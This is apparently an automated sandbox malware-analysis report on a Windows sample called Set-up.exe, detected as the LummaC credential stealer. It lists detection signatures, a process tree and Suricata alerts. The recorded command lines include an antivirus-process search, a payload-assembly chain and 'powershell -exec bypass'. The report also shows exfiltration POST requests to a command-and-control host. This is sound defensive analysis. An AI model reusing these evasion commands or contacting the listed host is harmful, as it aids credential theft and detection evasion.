Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1579048
MD5:55688fd8190f43db9f123f682bdd5181
SHA1:1279fc04f8b312c41c2e5fb00ebc405c297bb381
SHA256:02ad626bde649a1fccd40a8a4951efd92c127db92c4dd11abcbc0b571d096150
Tags:exeuser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Query firmware table information (likely to detect VMs)
Sigma detected: Invoke-Obfuscation Via Stdin
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • Set-up.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 55688FD8190F43DB9F123F682BDD5181)
    • cmd.exe (PID: 6980 cmdline: "C:\Windows\System32\cmd.exe" /c copy Meta Meta.cmd & Meta.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6228 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6224 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 4308 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4340 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5308 cmdline: cmd /c md 405361 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 3156 cmdline: findstr /V "Supervisors" Relaxation MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2736 cmdline: cmd /c copy /b ..\Singh + ..\Adaptation + ..\Pokemon + ..\Unified + ..\Failure + ..\Ups + ..\Related W MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Weapons.com (PID: 1928 cmdline: Weapons.com W MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 2736 cmdline: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="MWmHbEVHkRq1iRHQGoe4vxMFc6dY0_vvbg29zZMFNNw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f5149e8ed01de92</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- /#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 5936 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Invoke-Obfuscation Via Stdin
      Source: Process startedAuthor: Nikita Nazarov, oscd.community: Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="MWmHbEVHkRq1iRHQGoe4vxMFc6dY0_vvbg29zZMFNNw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="MWmHbEVHkRq1iRHQGoe4vxMFc6dY0_vvbg29zZMFNNw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="MWmHbEVHkRq1iRHQGoe4vxMFc6dY0_vvbg29zZMFNNw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
      Sigma detected: Suspicious Copy From or To System Directory
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Meta Meta.cmd & Meta.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Meta Meta.cmd & Meta.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 6856, ParentProcessName: Set-up.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Meta Meta.cmd & Meta.cmd, ProcessId: 6980, ProcessName: cmd.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="MWmHbEVHkRq1iRHQGoe4vxMFc6dY0_vvbg29zZMFNNw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Search for Antivirus process
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Meta Meta.cmd & Meta.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6980, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 4340, ProcessName: findstr.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-20T18:17:37.250644+010020283713Unknown Traffic192.168.2.449735172.67.202.229443TCP
      2024-12-20T18:17:39.242908+010020283713Unknown Traffic192.168.2.449737172.67.202.229443TCP
      2024-12-20T18:17:42.474097+010020283713Unknown Traffic192.168.2.449739172.67.202.229443TCP
      2024-12-20T18:17:44.714852+010020283713Unknown Traffic192.168.2.449740172.67.202.229443TCP
      2024-12-20T18:17:46.850848+010020283713Unknown Traffic192.168.2.449741172.67.202.229443TCP
      2024-12-20T18:17:49.151089+010020283713Unknown Traffic192.168.2.449742172.67.202.229443TCP
      2024-12-20T18:17:51.191259+010020283713Unknown Traffic192.168.2.449743172.67.202.229443TCP
      2024-12-20T18:17:53.238786+010020283713Unknown Traffic192.168.2.449744172.67.202.229443TCP
      2024-12-20T18:17:55.713159+010020283713Unknown Traffic192.168.2.449745104.21.84.113443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-20T18:17:38.018157+010020546531A Network Trojan was detected192.168.2.449735172.67.202.229443TCP
      2024-12-20T18:17:41.045751+010020546531A Network Trojan was detected192.168.2.449737172.67.202.229443TCP
      2024-12-20T18:17:54.023124+010020546531A Network Trojan was detected192.168.2.449744172.67.202.229443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-20T18:17:38.018157+010020498361A Network Trojan was detected192.168.2.449735172.67.202.229443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-20T18:17:41.045751+010020498121A Network Trojan was detected192.168.2.449737172.67.202.229443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-20T18:17:52.012867+010020480941Malware Command and Control Activity Detected192.168.2.449743172.67.202.229443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: Set-up.exeReversingLabs: Detection: 15%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 80.2% probability
      Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.202.229:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\405361\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\405361Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 172.67.202.229:443
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.202.229:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.84.113:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.202.229:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chillysalvagk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: chillysalvagk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GOTJK29VHUUPVXBEW77User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18167Host: chillysalvagk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OXVZ5FXK3GODLMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8758Host: chillysalvagk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X6XUJSRGLPR3NXFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20417Host: chillysalvagk.click
